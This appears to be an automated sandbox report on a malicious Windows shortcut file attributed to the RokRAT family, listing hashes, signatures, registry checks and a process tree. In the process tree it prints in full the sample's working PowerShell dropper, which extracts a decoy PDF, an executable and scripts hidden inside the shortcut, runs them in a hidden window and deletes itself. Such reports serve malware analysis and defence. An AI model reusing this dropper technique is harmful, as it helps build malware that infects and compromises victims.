Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
08-04-2024 07:38
Behavioral task
behavioral1
Sample
358122718ba11b3e8bb56340dbe94f51.lnk
Resource
win7-20240221-en
General
-
Target
358122718ba11b3e8bb56340dbe94f51.lnk
-
Size
56.2MB
-
MD5
358122718ba11b3e8bb56340dbe94f51
-
SHA1
0c61effe0c06d57835ead4a574dde992515b9382
-
SHA256
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
-
SHA512
7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01
-
SSDEEP
98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4040-151-0x0000000032550000-0x0000000032633000-memory.dmp family_rokrat behavioral2/memory/4040-152-0x0000000032550000-0x0000000032633000-memory.dmp family_rokrat -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 26 4040 powershell.exe 63 4040 powershell.exe 66 4040 powershell.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
powershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 2768 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\16676.dat powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exeAcroRd32.exepid process 2768 powershell.exe 2768 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 4040 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 5000 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid process 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe 5000 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 5044 wrote to memory of 3512 5044 cmd.exe cmd.exe PID 5044 wrote to memory of 3512 5044 cmd.exe cmd.exe PID 5044 wrote to memory of 3512 5044 cmd.exe cmd.exe PID 3512 wrote to memory of 2900 3512 cmd.exe cmd.exe PID 3512 wrote to memory of 2900 3512 cmd.exe cmd.exe PID 3512 wrote to memory of 2900 3512 cmd.exe cmd.exe PID 3512 wrote to memory of 2768 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 2768 3512 cmd.exe powershell.exe PID 3512 wrote to memory of 2768 3512 cmd.exe powershell.exe PID 2768 wrote to memory of 5000 2768 powershell.exe AcroRd32.exe PID 2768 wrote to memory of 5000 2768 powershell.exe AcroRd32.exe PID 2768 wrote to memory of 5000 2768 powershell.exe AcroRd32.exe PID 2768 wrote to memory of 4932 2768 powershell.exe cmd.exe PID 2768 wrote to memory of 4932 2768 powershell.exe cmd.exe PID 2768 wrote to memory of 4932 2768 powershell.exe cmd.exe PID 4932 wrote to memory of 4040 4932 cmd.exe powershell.exe PID 4932 wrote to memory of 4040 4932 cmd.exe powershell.exe PID 4932 wrote to memory of 4040 4932 cmd.exe powershell.exe PID 5000 wrote to memory of 3200 5000 AcroRd32.exe RdrCEF.exe PID 5000 wrote to memory of 3200 5000 AcroRd32.exe RdrCEF.exe PID 5000 wrote to memory of 3200 5000 AcroRd32.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 3644 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 2584 3200 RdrCEF.exe RdrCEF.exe PID 3200 wrote to memory of 2584 3200 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵PID:2900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C0FDD138495185A86898F2AB147197E --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3644
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=535C6F617BA2AD81D286BBC6E9F68392 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=535C6F617BA2AD81D286BBC6E9F68392 --renderer-client-id=2 --mojo-platform-channel-handle=1832 --allow-no-sandbox-job /prefetch:16⤵PID:2584
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7BB484CEB951B444F92F803AE87A0271 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7BB484CEB951B444F92F803AE87A0271 --renderer-client-id=4 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job /prefetch:16⤵PID:3020
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=58FDD16C91F10D95D3FEBB8A795B86E1 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:2172
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6B93A7718F614C649A64E8C851E4BEFC --mojo-platform-channel-handle=2804 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:1068
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=77F950869CF34B60F62A43F8364DAE6D --mojo-platform-channel-handle=1800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1nfmnceh\1nfmnceh.cmdline"6⤵PID:4932
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8899.tmp" "c:\Users\Admin\AppData\Local\Temp\1nfmnceh\CSCF38A7EB3C6AC450189A72A8BBE269D3D.TMP"7⤵PID:3016
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1kys3g1f\1kys3g1f.cmdline"6⤵PID:3364
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8964.tmp" "c:\Users\Admin\AppData\Local\Temp\1kys3g1f\CSCD7D2D9DECC64091BAE2605976DCEEA1.TMP"7⤵PID:672
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wnoimmzm\wnoimmzm.cmdline"6⤵PID:5044
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A8D.tmp" "c:\Users\Admin\AppData\Local\Temp\wnoimmzm\CSCD0EEBB33DF454E268F4AA3BA59264031.TMP"7⤵PID:4656
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zjeuiwp1\zjeuiwp1.cmdline"6⤵PID:2812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AEA.tmp" "c:\Users\Admin\AppData\Local\Temp\zjeuiwp1\CSC6325F8C6270D42E1A735C8A39E58A2A.TMP"7⤵PID:4132
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD5c2cc48a6bdcd0902fe17926298ca75a9
SHA1cfc147963bff5972c7b0aebd9e6ecab8d534f9d8
SHA256dd1f970ba30b36ad4b6253a122326c24d9d5ea38b779f9f3d5c38a4eb0bc2018
SHA512fb0620c3236cd1e6ea7fd596543c4ae1e1ae60c947fd6643f698926308c611dbbc3b0eb5a246148c9a3ac2ce72b0fd62d3f5f00903d1bffd4de48e11b56b7f7d
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
19KB
MD567e1477fffe48b31dde15c0a41570d0f
SHA1a69d6d464fd87bdcf286e777d4ab995c3d1c06bd
SHA2560348f1bf6dd8735467def7e02ae022c3fdedb702f97f0f88d62ae20d1cd6e3aa
SHA512e436002842aa4542d28495f363a492efe4895d0cc5ba19fdcb582a91053af9bc2be7185614dab9023f511c168060091e02e371ebd10c3ffbe2474098d550c511
-
Filesize
3KB
MD5796331ebbbf46de3987e690262d5e562
